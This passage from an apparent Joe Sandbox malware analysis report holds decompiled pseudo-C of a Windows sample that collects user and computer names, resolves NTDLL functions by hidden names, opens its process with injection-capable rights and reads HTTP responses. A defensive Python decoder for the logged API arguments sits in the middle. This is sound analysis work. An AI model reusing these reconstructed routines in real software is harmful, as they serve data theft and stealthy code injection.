          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?), ref: 005E3FCC
          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 005E3FFE
          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 005E4023
          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 005E4043
          • GetLastError.KERNEL32 ref: 005E4055
            • Part of subcall function 005E16B2: WaitForMultipleObjects.KERNEL32(00000002,005E7C47,00000000,005E7C47,?,?,?,005E7C47,0000EA60), ref: 005E16CD
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • GetLastError.KERNEL32(00000000), ref: 005E408A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
          • String ID: @MqtNqt
          • API String ID: 3369646462-2883916605
          • Opcode ID: 419702625537160e4993d791acf4b8225561956b50ab79bf192494c6fbac6999
          • Instruction ID: ba034369e5465393af4353ad6a82e7cb9276c0bb5c1477d9d75dc7ae83b16c80
          • Opcode Fuzzy Hash: 419702625537160e4993d791acf4b8225561956b50ab79bf192494c6fbac6999
          • Instruction Fuzzy Hash: 3F3144B5D00389EFDB24DFE2C8C899EBBB8FB48300F104979E68296151D731AA48DF10
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 43%
          			E005E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				char _v20;
          				intOrPtr _v24;
          				signed int _v28;
          				intOrPtr _v32;
          				void* __edi;
          				void* __esi;
          				intOrPtr _t58;
          				signed int _t60;
          				signed int _t62;
          				intOrPtr _t64;
          				intOrPtr _t66;
          				intOrPtr _t70;
          				void* _t72;
          				void* _t75;
          				void* _t76;
          				intOrPtr _t80;
          				WCHAR* _t83;
          				void* _t84;
          				void* _t85;
          				void* _t86;
          				intOrPtr _t92;
          				intOrPtr* _t102;
          				signed int _t103;
          				void* _t104;
          				intOrPtr _t105;
          				void* _t107;
          				intOrPtr* _t115;
          				void* _t119;
          				intOrPtr _t125;
          
          				_t58 =  *0x5ea3dc; // 0x2bc9cc0
          				_v24 = _t58;
          				_v28 = 8;
          				_v20 = GetTickCount();
          				_t60 = E005E6ABD();
          				_t103 = 5;
          				_t98 = _t60 % _t103 + 6;
          				_t62 = E005E6ABD();
          				_t117 = _t62 % _t103 + 6;
          				_v32 = _t62 % _t103 + 6;
          				_t64 = E005E42E9(_t60 % _t103 + 6);
          				_v16 = _t64;
          				if(_t64 != 0) {
          					_t66 = E005E42E9(_t117);
          					_v12 = _t66;
          					if(_t66 != 0) {
          						_push(5);
          						_t104 = 0xa;
          						_t119 = E005E398D(_t104,  &_v20);
          						if(_t119 == 0) {
          							_t119 = 0x5e918c;
          						}
          						_t70 = E005E5FA1(_v24);
          						_v8 = _t70;
          						if(_t70 != 0) {
          							_t115 = __imp__;
          							_t72 =  *_t115(_t119);
          							_t75 =  *_t115(_v8);
          							_t76 =  *_t115(_a4);
          							_t80 = E005E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
          							_v24 = _t80;
          							if(_t80 != 0) {
          								_t105 =  *0x5ea348; // 0x25dd5a8
          								_t102 =  *0x5ea138; // 0x5e7ddd
          								_t28 = _t105 + 0x5ebd10; // 0x530025
          								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
          								_push(4);
          								_t107 = 5;
          								_t83 = E005E398D(_t107,  &_v20);
          								_a8 = _t83;
          								if(_t83 == 0) {
          									_a8 = 0x5e9190;
          								}
          								_t84 =  *_t115(_a8);
          								_t85 =  *_t115(_v8);
          								_t86 =  *_t115(_a4);
          								_t125 = E005E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
          								if(_t125 == 0) {
          									E005E61DA(_v24);
          								} else {
          									_t92 =  *0x5ea348; // 0x25dd5a8
          									_t44 = _t92 + 0x5eba20; // 0x73006d
          									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
          									 *_a16 = _v24;
          									_v28 = _v28 & 0x00000000;
          									 *_a20 = _t125;
          								}
          							}
          							E005E61DA(_v8);
          						}
          						E005E61DA(_v12);
          					}
          					E005E61DA(_v16);
          				}
          				return _v28;
          			}
          0x005e723e
          0x005e7246
          0x005e7249
          0x005e7256
          0x005e7259
          0x005e7260
          0x005e7267
          0x005e726a
          0x005e7277
          0x005e727a
          0x005e727d
          0x005e7282
          0x005e7287
          0x005e728f
          0x005e7294
          0x005e7299
          0x005e729f
          0x005e72a3
          0x005e72ac
          0x005e72b0
          0x005e72b2
          0x005e72b2
          0x005e72ba
          0x005e72bf
          0x005e72c4
          0x005e72ca
          0x005e72d1
          0x005e72e2
          0x005e72e9
          0x005e72fb
          0x005e7300
          0x005e7305
          0x005e730e
          0x005e7317
          0x005e7320
          0x005e7336
          0x005e733b
          0x005e733f
          0x005e7343
          0x005e7348
          0x005e734d
          0x005e734f
          0x005e734f
          0x005e7359
          0x005e7362
          0x005e7369
          0x005e7385
          0x005e7389
          0x005e73c2
          0x005e738b
          0x005e738e
          0x005e7396
          0x005e73a7
          0x005e73af
          0x005e73b7
          0x005e73bb
          0x005e73bb
          0x005e7389
          0x005e73ca
          0x005e73ca
          0x005e73d2
          0x005e73d2
          0x005e73da
          0x005e73da
          0x005e73e6

          APIs
          • GetTickCount.KERNEL32 ref: 005E7250
          • lstrlen.KERNEL32(00000000,00000005), ref: 005E72D1
          • lstrlen.KERNEL32(?), ref: 005E72E2
          • lstrlen.KERNEL32(00000000), ref: 005E72E9
          • lstrlenW.KERNEL32(80000002), ref: 005E72F0
          • lstrlen.KERNEL32(?,00000004), ref: 005E7359
          • lstrlen.KERNEL32(?), ref: 005E7362
          • lstrlen.KERNEL32(?), ref: 005E7369
          • lstrlenW.KERNEL32(?), ref: 005E7370
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlen$CountFreeHeapTick
          • String ID:
          • API String ID: 2535036572-0
          • Opcode ID: cec8693603dfa982ebb3e04c30011b561d76fcc73e022306c47585afee5978c3
          • Instruction ID: 6a2835543c14803ba3ff6ed737296278cb4d242943f5cfc825a5eda2ef41cd57
          • Opcode Fuzzy Hash: cec8693603dfa982ebb3e04c30011b561d76fcc73e022306c47585afee5978c3
          • Instruction Fuzzy Hash: 4C51B072D0025AABCF1AAFA6CC499DE7FB1FF48354F054024F944AB211DB31CA14EBA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E1340() {
          				long _v8;
          				long _v12;
          				int _v16;
          				long _t39;
          				long _t43;
          				signed int _t47;
          				short _t51;
          				signed int _t52;
          				int _t56;
          				int _t57;
          				char* _t64;
          				short* _t67;
          
          				_v16 = 0;
          				_v8 = 0;
          				GetUserNameW(0,  &_v8);
          				_t39 = _v8;
          				if(_t39 != 0) {
          					_v12 = _t39;
          					_v8 = 0;
          					GetComputerNameW(0,  &_v8);
          					_t43 = _v8;
          					if(_t43 != 0) {
          						_t11 = _t43 + 2; // 0x775ec742
          						_v12 = _v12 + _t11;
          						_t64 = E005E33DC(_v12 + _t11 << 2);
          						if(_t64 != 0) {
          							_t47 = _v12;
          							_t67 = _t64 + _t47 * 2;
          							_v8 = _t47;
          							if(GetUserNameW(_t67,  &_v8) == 0) {
          								L7:
          								E005E61DA(_t64);
          							} else {
          								_t51 = 0x40;
          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
          								_t52 = _v8;
          								_v12 = _v12 - _t52;
          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
          									goto L7;
          								} else {
          									_t56 = _v12 + _v8;
          									_t31 = _t56 + 2; // 0x5e3e01
          									_v12 = _t56;
          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
          									_v8 = _t57;
          									if(_t57 == 0) {
          										goto L7;
          									} else {
          										_t64[_t57] = 0;
          										_v16 = _t64;
          									}
          								}
          							}
          						}
          					}
          				}
          				return _v16;
          			}
          0x005e134e
          0x005e1351
          0x005e1354
          0x005e135a
          0x005e135f
          0x005e1365
          0x005e136d
          0x005e1370
          0x005e1376
          0x005e137b
          0x005e1384
          0x005e1388
          0x005e1395
          0x005e1399
          0x005e139b
          0x005e139f
          0x005e13a2
          0x005e13b2
          0x005e1405
          0x005e1406
          0x005e13b4
          0x005e13b9
          0x005e13ba
          0x005e13bf
          0x005e13c2
          0x005e13d5
          0x00000000
          0x005e13d7
          0x005e13da
          0x005e13df
          0x005e13ed
          0x005e13f0
          0x005e13f6
          0x005e13fb
          0x00000000
          0x005e13fd
          0x005e13fd
          0x005e1400
          0x005e1400
          0x005e13fb
          0x005e13d5
          0x005e140b
          0x005e140c
          0x005e137b
          0x005e1412

          APIs
          • GetUserNameW.ADVAPI32(00000000,005E3DFF), ref: 005E1354
          • GetComputerNameW.KERNEL32(00000000,005E3DFF), ref: 005E1370
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetUserNameW.ADVAPI32(00000000,005E3DFF), ref: 005E13AA
          • GetComputerNameW.KERNEL32(005E3DFF,775EC740), ref: 005E13CD
          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,005E3DFF,00000000,005E3E01,00000000,00000000,?,775EC740,005E3DFF), ref: 005E13F0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
          • String ID: @hqt
          • API String ID: 3850880919-2648236075
          • Opcode ID: bcc20651b123fff1ef75ac1805a90293401c104b838274f8afb418753ff9e5ff
          • Instruction ID: 609b3853b451ca81f4c5e33b5d642d3ce4ee56ab41f58c03c52af7e52a964c25
          • Opcode Fuzzy Hash: bcc20651b123fff1ef75ac1805a90293401c104b838274f8afb418753ff9e5ff
          • Instruction Fuzzy Hash: D221F8B6900148FFCB15DFE6C9888EEBBB8FF44300B5044AAE541E7240DB30AB45DB55
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E54D8(intOrPtr _a4) {
          				void* _t2;
          				unsigned int _t4;
          				void* _t5;
          				long _t6;
          				void* _t7;
          				void* _t15;
          
          				_t2 = CreateEventA(0, 1, 0, 0);
          				 *0x5ea30c = _t2;
          				if(_t2 == 0) {
          					return GetLastError();
          				}
          				_t4 = GetVersion();
          				if(_t4 != 5) {
          					L4:
          					if(_t15 <= 0) {
          						_t5 = 0x32;
          						return _t5;
          					}
          					L5:
          					 *0x5ea2fc = _t4;
          					_t6 = GetCurrentProcessId();
          					 *0x5ea2f8 = _t6;
          					 *0x5ea304 = _a4;
          					_t7 = OpenProcess(0x10047a, 0, _t6);
          					 *0x5ea2f4 = _t7;
          					if(_t7 == 0) {
          						 *0x5ea2f4 =  *0x5ea2f4 | 0xffffffff;
          					}
          					return 0;
          				}
          				if(_t4 >> 8 > 0) {
          					goto L5;
          				}
          				_t15 = _t4 - _t4;
          				goto L4;
          			}
          0x005e54e0
          0x005e54e6
          0x005e54ed
          0x00000000
          0x005e5547
          0x005e54ef
          0x005e54f7
          0x005e5504
          0x005e5504
          0x005e5544
          0x00000000
          0x005e5544
          0x005e5506
          0x005e5506
          0x005e550b
          0x005e551d
          0x005e5522
          0x005e5528
          0x005e552e
          0x005e5535
          0x005e5537
          0x005e5537
          0x00000000
          0x005e553e
          0x005e5500
          0x00000000
          0x00000000
          0x005e5502
          0x00000000

          APIs
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,005E5037,?), ref: 005E54E0
          • GetVersion.KERNEL32 ref: 005E54EF
          • GetCurrentProcessId.KERNEL32 ref: 005E550B
          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E5528
          • GetLastError.KERNEL32 ref: 005E5547
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
          • String ID: @MqtNqt
          • API String ID: 2270775618-2883916605
          • Opcode ID: d1edae39775a652a05b546f2fad1c1d981fde70a7db3b0aaf2aa6369b4eadd20
          • Instruction ID: b0d0995831089964702133a2878fb90af46407304ca6392be4fb84846dff4f75
          • Opcode Fuzzy Hash: d1edae39775a652a05b546f2fad1c1d981fde70a7db3b0aaf2aa6369b4eadd20
          • Instruction Fuzzy Hash: E5F0A4B45407C29BD72C8F31AC99B143F63B724755F50081AE6D3DE1E0F6709488EB16
          Uniqueness

          Uniqueness Score: -1.00%
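          Reading the raw argument values in the "APIs" lists above is easier with a small decoder. The following is an added example for this report (not code from Joe Sandbox, nor from the sample). It rests on one reading of the logged values that the report itself does not spell out: for string-pointer parameters such as those of GetModuleHandleA and GetProcAddress in E005E37DF and E005E6BF9, the DWORD printed by the plugin is the first four bytes of the pointed-to string in little-endian order (4C44544E reads "NTDL", 7243775A reads "ZwCr", 4E52454B reads "KERN", 73797325 reads "%sys"), and the commented constants in E005E7238 (0x530025, 0x73006d) are two UTF-16 characters each. The same helper expands the OpenProcess access mask 0x10047A seen in E005E54D8 and the HttpQueryInfoA levels 0x20000013 and 0x16 seen in E005E3FA5; the constant tables are partial and contain only the Windows values needed here. The sample lines are copied from the lists above.

```python
"""Decode raw argument values from the Joe Sandbox "APIs" lists of this report.
Added example, not part of the report or of the analysed sample. Assumption:
a DWORD logged for a string-pointer argument is the first four bytes of the
string (little-endian), so it can be turned back into readable text offline."""
import re
import struct
from typing import Callable, Dict, List, Optional, Tuple


def dword_to_ascii(value: int) -> Optional[str]:
    """Read a 32-bit value as four little-endian bytes; return the text if all
    four are printable ASCII (0x4C44544E -> 'NTDL'), else None."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def dword_to_utf16(value: int) -> Optional[str]:
    """Same for a UTF-16LE string: two characters per dword (0x00530025 -> '%S')."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    text = raw.decode("utf-16-le", errors="replace")
    if all(0x20 <= ord(c) < 0x7F for c in text):
        return text
    return None


# Partial tables: only the Windows constants needed for the calls in this report.
PROCESS_ACCESS: Dict[int, str] = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
HTTP_QUERY_LEVELS: Dict[int, str] = {
    0x13: "HTTP_QUERY_STATUS_CODE", 0x15: "HTTP_QUERY_RAW_HEADERS",
    0x16: "HTTP_QUERY_RAW_HEADERS_CRLF",
}
HTTP_QUERY_FLAGS: Dict[int, str] = {0x20000000: "HTTP_QUERY_FLAG_NUMBER"}


def decode_mask(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bit mask into names, low bit first; unknown bits are kept as hex."""
    names, rest = [], value
    for bit in sorted(table):
        if value & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return names


def decode_http_query(value: int) -> str:
    """WinINet HttpQueryInfo: info level in the low 16 bits, modifier flags above."""
    level = HTTP_QUERY_LEVELS.get(value & 0xFFFF, hex(value & 0xFFFF))
    return "|".join([level] + decode_mask(value & ~0xFFFF, HTTP_QUERY_FLAGS))


# (API name, argument index) -> decoder for arguments that are masks, not pointers.
MASK_ARGS: Dict[Tuple[str, int], Callable[[int], str]] = {
    ("OpenProcess", 0): lambda v: "|".join(decode_mask(v, PROCESS_ACCESS)),
    ("HttpQueryInfoA", 1): decode_http_query,
}

LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]+)$")


def annotate_line(line: str) -> Optional[dict]:
    """Parse one 'APIs' line of the report and annotate every argument we can read."""
    m = LINE_RE.search(line.strip().lstrip("• ").strip())
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    out = []
    for i, raw in enumerate(args):
        raw = raw.strip()
        try:
            value = int(raw, 16)
        except ValueError:          # '?' (unknown to the plugin) or a literal such as '='
            out.append((raw, None))
            continue
        note = None
        if (m.group("api"), i) in MASK_ARGS:
            note = MASK_ARGS[(m.group("api"), i)](value)
        elif dword_to_ascii(value):
            note = "ascii %r" % dword_to_ascii(value)
        elif dword_to_utf16(value):
            note = "utf16 %r" % dword_to_utf16(value)
        out.append((raw, note))
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": m.group("ref"), "args": out}


# Sample input: lines copied verbatim from the APIs lists of this report.
REPORT_LINES = [
    "GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,005E37FB,?,?,?,?,00000000,00000000), ref: 005E6C1E",
    "GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E6C40",
    "GetModuleHandleA.KERNEL32(4E52454B,02BC8E14,73797325), ref: 005E387F",
    "OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E5528",
    "HttpQueryInfoA.WININET(?,20000013,?,?), ref: 005E3FFE",
]


def annotate_report(lines: List[str] = REPORT_LINES) -> List[dict]:
    return [rec for rec in (annotate_line(l) for l in lines) if rec]


if __name__ == "__main__":
    for rec in annotate_report():
        notes = ", ".join(f"{raw}={note}" for raw, note in rec["args"] if note)
        print(f"{rec['api']} @ {rec['ref']}: {notes}")
```

          Run on the five sample lines, the decoder shows the module and export names the sample resolves at run time ("NTDL", "ZwCr", "KERN", "%sys"), the OpenProcess mask as CREATE_THREAD | VM_OPERATION | VM_READ | VM_WRITE | DUP_HANDLE | QUERY_INFORMATION | SYNCHRONIZE, and 0x20000013 as HTTP_QUERY_STATUS_CODE with HTTP_QUERY_FLAG_NUMBER. Only the first four bytes of each string are recoverable this way; the full export names live in the memory dumps listed under Memory Dump Source.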

          APIs
          • SysAllocString.OLEAUT32(00000000), ref: 005E3ABD
          • SysAllocString.OLEAUT32(0070006F), ref: 005E3AD1
          • SysAllocString.OLEAUT32(00000000), ref: 005E3AE3
          • SysFreeString.OLEAUT32(00000000), ref: 005E3B4B
          • SysFreeString.OLEAUT32(00000000), ref: 005E3B5A
          • SysFreeString.OLEAUT32(00000000), ref: 005E3B65
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$AllocFree
          • String ID:
          • API String ID: 344208780-0
          • Opcode ID: da7197af15f27d93cc90dd169e06c86201baeee54c4a68c0f40b0183170d6815
          • Instruction ID: ee4e6a3dbf1933170c63b4a9e8e18dbc717e47ba63025bc9a564a41fa26965b1
          • Opcode Fuzzy Hash: da7197af15f27d93cc90dd169e06c86201baeee54c4a68c0f40b0183170d6815
          • Instruction Fuzzy Hash: EF419F36D00649ABDF05DFBDC848A9EBBBAFF89300F104466E951EB120DA71DE05CB91
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
          				intOrPtr _v8;
          				intOrPtr _t23;
          				intOrPtr _t26;
          				_Unknown_base(*)()* _t28;
          				intOrPtr _t30;
          				_Unknown_base(*)()* _t32;
          				intOrPtr _t33;
          				_Unknown_base(*)()* _t35;
          				intOrPtr _t36;
          				_Unknown_base(*)()* _t38;
          				intOrPtr _t39;
          				_Unknown_base(*)()* _t41;
          				intOrPtr _t44;
          				struct HINSTANCE__* _t48;
          				intOrPtr _t54;
          
          				_t54 = E005E33DC(0x20);
          				if(_t54 == 0) {
          					_v8 = 8;
          				} else {
          					_t23 =  *0x5ea348; // 0x25dd5a8
          					_t1 = _t23 + 0x5eb436; // 0x4c44544e
          					_t48 = GetModuleHandleA(_t1);
          					_t26 =  *0x5ea348; // 0x25dd5a8
          					_t2 = _t26 + 0x5eb85c; // 0x7243775a
          					_v8 = 0x7f;
          					_t28 = GetProcAddress(_t48, _t2);
          					 *(_t54 + 0xc) = _t28;
          					if(_t28 == 0) {
          						L8:
          						E005E61DA(_t54);
          					} else {
          						_t30 =  *0x5ea348; // 0x25dd5a8
          						_t5 = _t30 + 0x5eb849; // 0x614d775a
          						_t32 = GetProcAddress(_t48, _t5);
          						 *(_t54 + 0x10) = _t32;
          						if(_t32 == 0) {
          							goto L8;
          						} else {
          							_t33 =  *0x5ea348; // 0x25dd5a8
          							_t7 = _t33 + 0x5eb72b; // 0x6e55775a
          							_t35 = GetProcAddress(_t48, _t7);
          							 *(_t54 + 0x14) = _t35;
          							if(_t35 == 0) {
          								goto L8;
          							} else {
          								_t36 =  *0x5ea348; // 0x25dd5a8
          								_t9 = _t36 + 0x5eb883; // 0x4e6c7452
          								_t38 = GetProcAddress(_t48, _t9);
          								 *(_t54 + 0x18) = _t38;
          								if(_t38 == 0) {
          									goto L8;
          								} else {
          									_t39 =  *0x5ea348; // 0x25dd5a8
          									_t11 = _t39 + 0x5eb87b; // 0x6c43775a
          									_t41 = GetProcAddress(_t48, _t11);
          									 *(_t54 + 0x1c) = _t41;
          									if(_t41 == 0) {
          										goto L8;
          									} else {
          										 *((intOrPtr*)(_t54 + 4)) = _a4;
          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
          										_t44 = E005E7A08(_t54, _a8);
          										_v8 = _t44;
          										if(_t44 != 0) {
          											goto L8;
          										} else {
          											 *_a12 = _t54;
          										}
          									}
          								}
          							}
          						}
          					}
          				}
          				return _v8;
          			}

          APIs
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,005E37FB,?,?,?,?,00000000,00000000), ref: 005E6C1E
          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E6C40
          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E6C56
          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E6C6C
          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E6C82
          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E6C98
            • Part of subcall function 005E7A08: memset.NTDLL ref: 005E7A87
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$AllocateHandleHeapModulememset
          • String ID:
          • API String ID: 1886625739-0
          • Opcode ID: 89b1e85cc4494b067047b1324929df39ab4bc14e9715bf7cf7a5b1330ccd4f39
          • Instruction ID: f081e29508828cdb904efbeaf07c5f8d0341490c3ff122f6ae8977813ae1022e
          • Opcode Fuzzy Hash: 89b1e85cc4494b067047b1324929df39ab4bc14e9715bf7cf7a5b1330ccd4f39
          • Instruction Fuzzy Hash: 10211EB150078A9FD718DF6BC994E6A7BECFB243817104855E5C5CB621E770ED08CB61
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 39%
          			E005E454F(void* __eax, void* __ecx) {
          				char _v8;
          				void* _v12;
          				intOrPtr _v16;
          				char _v20;
          				void* __esi;
          				intOrPtr _t36;
          				intOrPtr* _t37;
          				intOrPtr* _t39;
          				void* _t53;
          				long _t58;
          				void* _t59;
          
          				_t53 = __ecx;
          				_t59 = __eax;
          				_t58 = 0;
          				ResetEvent( *(__eax + 0x1c));
          				_push( &_v8);
          				_push(4);
          				_push( &_v20);
          				_push( *((intOrPtr*)(_t59 + 0x18)));
          				if( *0x5ea160() != 0) {
          					L5:
          					if(_v8 == 0) {
          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
          						L21:
          						return _t58;
          					}
          					 *0x5ea174(0, 1,  &_v12);
          					if(0 != 0) {
          						_t58 = 8;
          						goto L21;
          					}
          					_t36 = E005E33DC(0x1000);
          					_v16 = _t36;
          					if(_t36 == 0) {
          						_t58 = 8;
          						L18:
          						_t37 = _v12;
          						 *((intOrPtr*)( *_t37 + 8))(_t37);
          						goto L21;
          					}
          					_push(0);
          					_push(_v8);
          					_push( &_v20);
          					while(1) {
          						_t39 = _v12;
          						_t56 =  *_t39;
          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
          						ResetEvent( *(_t59 + 0x1c));
          						_push( &_v8);
          						_push(0x1000);
          						_push(_v16);
          						_push( *((intOrPtr*)(_t59 + 0x18)));
          						if( *0x5ea160() != 0) {
          							goto L13;
          						}
          						_t58 = GetLastError();
          						if(_t58 != 0x3e5) {
          							L15:
          							E005E61DA(_v16);
          							if(_t58 == 0) {
          								_t58 = E005E2B18(_v12, _t59);
          							}
          							goto L18;
          						}
          						_t58 = E005E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
          						if(_t58 != 0) {
          							goto L15;
          						}
          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
          						if(_t58 != 0) {
          							goto L15;
          						}
          						L13:
          						_t58 = 0;
          						if(_v8 == 0) {
          							goto L15;
          						}
          						_push(0);
          						_push(_v8);
          						_push(_v16);
          					}
          				}
          				_t58 = GetLastError();
          				if(_t58 != 0x3e5) {
          					L4:
          					if(_t58 != 0) {
          						goto L21;
          					}
          					goto L5;
          				}
